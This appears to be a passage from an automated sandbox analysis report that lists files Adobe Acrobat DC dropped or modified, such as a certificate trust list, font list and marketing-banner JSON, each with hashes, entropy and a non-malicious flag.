                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):192
                            Entropy (8bit):2.7895108629891827
                            Encrypted:false
                            SSDEEP:
                            MD5:7F1AFEDD78C510EA0992F06A24306518
                            SHA1:3BB706397D9FF724E4E270C86F0074F4159D89F9
                            SHA-256:2383E6B555505C96FDD40435373A9C390D977E6146EC457C85BCACF2C603B571
                            SHA-512:37E051CD58D0E5F8C590A399EE58B55505482361CA4DABEB9DF43DB2070D70C2881695AED0EAD4BEBE55A90191474290DBB8C10A5E3C357EDBDBECBEF74701B7
                            Malicious:false
                            Reputation:unknown
                            Preview:p...... .............#..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:modified
                            Size (bytes):328
                            Entropy (8bit):3.1356875516282012
                            Encrypted:false
                            SSDEEP:
                            MD5:E19A6F130A6FFA5EB23ECB078AD61E8E
                            SHA1:C952F9E8D0091A391C6E09E1131B8335E88FD605
                            SHA-256:54124BCC1FC6F7A960B8375E35A069EC3E8517668E0B046F2D745969CCB7856C
                            SHA-512:E10C16CF73ED942D20D1144BD46615DA3F76714B1966F663F77FF8F34354C423590D0F49392145191367477081D64D961754D207A67C7959C09CF27F59554DC4
                            Malicious:false
                            Reputation:unknown
                            Preview:p...... .........i.%.#..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):185099
                            Entropy (8bit):5.182478651346149
                            Encrypted:false
                            SSDEEP:
                            MD5:94185C5850C26B3C6FC24ABC385CDA58
                            SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                            SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                            SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                            Malicious:false
                            Reputation:unknown
                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):0
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:
                            MD5:94185C5850C26B3C6FC24ABC385CDA58
                            SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                            SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                            SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                            Malicious:false
                            Reputation:unknown
                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):295
                            Entropy (8bit):5.377348620144158
                            Encrypted:false
                            SSDEEP:
                            MD5:366DAF513A997A3B00DE36F5FB89C306
                            SHA1:F952B061260EA789F4C8052D76C5C9B23D667BB3
                            SHA-256:F29B1BC1FCCF8156E2424BC63DF2CE1C5DAF64A86AE0A28EA9DA1200C6106F23
                            SHA-512:BF46533BF573E38489AD2809135CAABF9213CD7334575DACF808B25039144B4A3E51413C06B1E796993A9D2177E45F01BC27674509F62A5FCD8ABC54835B732F
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.324671433247312
                            Encrypted:false
                            SSDEEP:
                            MD5:5217F313120E7EBF174A912C19C29214
                            SHA1:5C02360F9DA327CDCFF96186E88B09EF04CA40A0
                            SHA-256:8FD30DFCF52B19E23400073BD9AA802EAF665B8986D2769DDB486E671E9C5BE2
                            SHA-512:7FB7293A81263F2656E183EB5BC9C5020388BCBE9AC8B3221468412CF559E57B44AA6723FD0C6C4B9981DD1521F159428E049786F1AD355CCA8F4967E25D378E
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.304197616321345
                            Encrypted:false
                            SSDEEP:
                            MD5:1AFF7EF01F753B8364FEDCD1D03DD820
                            SHA1:FCFB1F3E9B08D0ABA05D7BA249B19D0684A054A8
                            SHA-256:EBC92DDBA6B61BCDCADCFEA776BEEDB51F8739FD9D4C30D51A926D7F3F9A38D3
                            SHA-512:4B2378237B10D4C8CB2FA97E2FF985DDDFE785F40192CB9B43F5CB8BAEBAE1A19A0CCAF96CBBF64AA2F5DB1FD5960A83B59EB55DFFD649CA70499A2F8AE06B77
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):285
                            Entropy (8bit):5.366219518843994
                            Encrypted:false
                            SSDEEP:
                            MD5:1D07D23616040866C0BD99BA21B07F37
                            SHA1:FA4B8EFD2DEB578732AD0F3F0A7EFFBCE6979B2B
                            SHA-256:F713725AC822096FC35D907CBEDC5D24BF7EBA6E88AE9B1DB52414C6556CFFC9
                            SHA-512:5569AC3855DC284EC51D791AD865C5987997D27C30AFDFE99C0513BBE6FA0A65E2858E92EC728EAB3D3867EBDE760FF3CB3E0F288EA776A9054A1BB5ACF0504B
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1055
                            Entropy (8bit):5.6593957617805675
                            Encrypted:false
                            SSDEEP:
                            MD5:1696205CB8AC51D73DFC20EAB3CFF0FF
                            SHA1:CAF105E32DBCBAAAAF4C5718CEF6BA3C2F82F93E
                            SHA-256:E65312665E8BE27E56B7F6FDEF5947EDC2A24D0E998B3896E38239720DE0D94D
                            SHA-512:FA71D4AC6AA68995CCAA46CD3C2407578C8F03D23C146FC607E2BDBD42F55FCE391F26D5FD39BBBEB4EA0E0882D19B7B1764815E4C9DCD5149A75E3AE8BE7BA4
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_1","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"eb1a4bce-8215-46f1-b44c-154b21a85d60","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingScheme":tr
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1050
                            Entropy (8bit):5.64934654746154
                            Encrypted:false
                            SSDEEP:
                            MD5:BEAD9E7E0A7C9F24CAE107CD18B22A9D
                            SHA1:26FA36F2B0B5C46B08F6150C825792A73B22E488
                            SHA-256:5B69C11D9A732A409704D333ED65AA0CF4006AC63362FC3DA32C1DAB9CD5675E
                            SHA-512:B89EA328EE68094B4162765BAE21C10B28CDD13DB308796D1E870833ABEFD1C7F9A41DE8779F84EAE4F284FFFE8C9F890CCE760F5507CA2FE7C0BEB3CDE4370E
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):292
                            Entropy (8bit):5.31337177972909
                            Encrypted:false
                            SSDEEP:
                            MD5:802FAB7B0F90B82685BDE1EA05CEB62C
                            SHA1:A48EBB24FC7B5B5851DCD6729A1F7397EBD9D70B
                            SHA-256:57F3673D97E3B323CAA943AF55B46F37A0F7978CFE2DF3333C20EFEFF6464298
                            SHA-512:0B10B9B5AAAB6A6FBCC797E392C899E8D5AA4762E67670399E347A5934BD68322209E92FC237A1134B6C4BE01A0F0A0AD28FCB2E5F3843CA090C80A4016B5692
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1038
                            Entropy (8bit):5.64404794990277
                            Encrypted:false
                            SSDEEP:
                            MD5:810BF1BB7E60EDF674F266F6B2D538F2
                            SHA1:D4F2F6805268525542EC30B88B46AB10CC1B8DAA
                            SHA-256:B8EA4AD15488FAB56F082576254ADA24E1B5E132B118F9752BC6A18DCD35029E
                            SHA-512:15053C05673DC9112AFA99CE2EDB3B1505F4E83EC8C26C3AADA857833A611E24E35E3246576BC678099E431999EFE46B3C9DCA27AE64DF9F6D8556291D912077
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1164
                            Entropy (8bit):5.697439405163199
                            Encrypted:false
                            SSDEEP:
                            MD5:9156301B5F9FCCF05C3FB49AE02528CF
                            SHA1:BC503B6685107475612D4AE2C5D8D29E83CCB67A
                            SHA-256:1BBD94C1BB197ED5ED78AAD80EB768C7F73AA56158193756349A63868AA2D09E
                            SHA-512:43C5D871E4A4A4DB84540A2621F45E4FEA47FA6A6A80C6443C54138B3C2C02F35DEE5BBBD9201C05444D41394C8811C21F44525565D44F65840EC40E214B64D6
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.317266699596635
                            Encrypted:false
                            SSDEEP:
                            MD5:2CD283C28D148CDAF74ACE3CD1EA26C7
                            SHA1:317026B80B18CC4283D8B0707169B55AE2037E76
                            SHA-256:AAE8AFBD22FE9A3FC7B06F355BA238E732C0204621C1E50208D4D9BD5BC7C9BD
                            SHA-512:8D964E19A83B790D836285B184BDFDF597B90D25E1CDCA234A22881962BE437C4BBFDD5E2B7D04E2FC5C5AD6CA54298BF8AD1EDF303D7E2C593CE05821CAD67E
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1395
                            Entropy (8bit):5.773656495998916
                            Encrypted:false
                            SSDEEP:
                            MD5:E7447B8C7DA866DF657F62142530E96B
                            SHA1:89A1291C82631804666927B9ECDF8382AE63EA53
                            SHA-256:0110F2E477AEC5D09E68D88B6BAC13BFB396B95668F3954BCB23659D18E37F4C
                            SHA-512:9DB65BC55A26C42423F30299A53252F49534E587FA696B7A62615C5EECAD2B037CFA382DB1FE12E3BDA1E0E5AB7D01A2D8A15E9DEE01336F5EC4068CC53CE6A9
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):291
                            Entropy (8bit):5.300695125795607
                            Encrypted:false
                            SSDEEP:
                            MD5:1D758FC2EBE703D345D19A330DA11174
                            SHA1:F68FABF1D240D2C318F1C1ECADC7C5309742F32D
                            SHA-256:169B7E7F0950EA4486E0C4BE66114DBC9157058EAF432EAB48D826A72FF82E06
                            SHA-512:C48CB27863C4C66A418D34BFA482EADB7B395EEC74E7ACB73EC926022364A1137218C7659FCF14D9AA6044E3692894C290CEB28B1AA36A48339FA1BBC3C042AA
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):287
                            Entropy (8bit):5.303665692926439
                            Encrypted:false
                            SSDEEP:
                            MD5:AF0DE8F470DBDC97DD0DD65E0944EC4B
                            SHA1:2635253B971F4162DC2D8FFC691E9E8EBBAFD6B3
                            SHA-256:1A69987C845F0073B76B32C6808FC866B2142E28C2DEABD4A18090B4B7F9C59B
                            SHA-512:5F2F156DBEB0093CAAF7CAF0B981CCF93770A0B7D0D4FED0DE5C9B8469F1CD710EAB620F11DAF28FE288A4D767287D376A37C882E5AAFD31A2553C1E42D8B71B
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1026
                            Entropy (8bit):5.628947027333228
                            Encrypted:false
                            SSDEEP:
                            MD5:CF66B33D1B4B0B7943AA9054C624CB24
                            SHA1:50068F41DA8D948F5C81B0B3B3CF654A95BD3C67
                            SHA-256:130CCD7F1FB656DC33C523986E58A170BB2DECF8AE74BF28DF42D4CEF0A49595
                            SHA-512:70AFB8A3FA3DDA748C43ED2945CDD04D886BDB3897C886A2FD3F80353F5A8A62D5B39F3B3DC30F70157D5F1E0F502C6056347A82B3E1FF2B9CCD932D9D85E45E
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_0","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"6291f52b-6cb0-4d31-bc46-37ce85e9eb25","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1751323379000,"s
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):5.279714479172621
                            Encrypted:false
                            SSDEEP:
                            MD5:1605DB8B14DA5DF2190404977E12119B
                            SHA1:581AA3C542966D17D749EE87E5CDD852EE4596A6
                            SHA-256:8A261E51C449E77D361F8A3902F535EF88FD69231BDFA736B53D6F87EA545A5F
                            SHA-512:1FAF5F0DE2BFAD4E86BC6C8757099918D29FD9D0AB13C5DE50093C39ADD96AF8AA21CFCBB50D29647768BA5E819D39EA658C57456482AAD636DD17EE37648927
                            Malicious:false
                            Reputation:unknown
                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):782
                            Entropy (8bit):5.3689733137132
                            Encrypted:false
                            SSDEEP:
                            MD5:8005268A07D46A3FFF62F021BC97CE8A
                            SHA1:0F8180FFFF9CADDC7DCD6C560A82F8B73F24CF0E
                            SHA-256:27DECF8272FB039722B9F14835FE35251DE8C51A5E76BDBC84D87FDA1F4EA87C
                            SHA-512:CB54C5C764FE4782A9E287A2180D72D6BD5B543C40660C42217F33CFAC6A9989A6EEDAA36D6EA46EB0F1C17FD0E10A015A3BD21659DC3805CA741999FDEACB74
                            Malicious:false
                            Reputation:unknown
